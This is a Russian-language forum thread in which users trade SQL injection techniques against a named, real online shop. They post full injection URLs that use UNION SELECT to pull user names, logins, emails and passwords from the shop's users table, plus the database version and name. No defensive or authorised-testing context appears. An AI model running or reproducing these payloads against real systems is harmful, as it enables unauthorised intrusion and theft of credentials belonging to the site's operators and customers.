У тебя заруб идёт на предварительном запрос, не на том, который выводится. Если бы ты был упорнее, ты бы нашёл модуль, где нету никаких предварительных запросов, ака "посчитать количество чего-либо" или "взять имя чего-то где модуль=чему-то". Например в модуле news есть SQL-Injection с выводом:

опередил.... лано от себя добавлю, что в модуле catalog можно пользовать подзапросы:
пример:

__________________
Карфаген должен быть разрушен...

Спс большое, плюсеги поставил )

ну и я добавлю

http://www.acasashop.md/?module=news&cmd=view&id=-16'+UNION+SELECT+1,concat(name,char(58),login),ema il,CONCAT_WS(0x3a,USER(%20),VERSION(),DATABASE()), password,6%20from%20users/*

вы скули ищете тулзами или ручками?

Piflit, есть скули, которые ни одна тулза не найдёт, когда для каждой нужен индивидуальный подход, поэтому я предпочитаю прямые ручки в противовес прогам.

Я ручьками )

и еще одна табличка)
http://www.acasashop.md/?module=news&cmd=view&id=-16'+UNION+SELECT+1,password,3,4,name,6%20from%20ie system_acasashop.users/*

kair, да ты потрошишь одну и ту же табличку... )))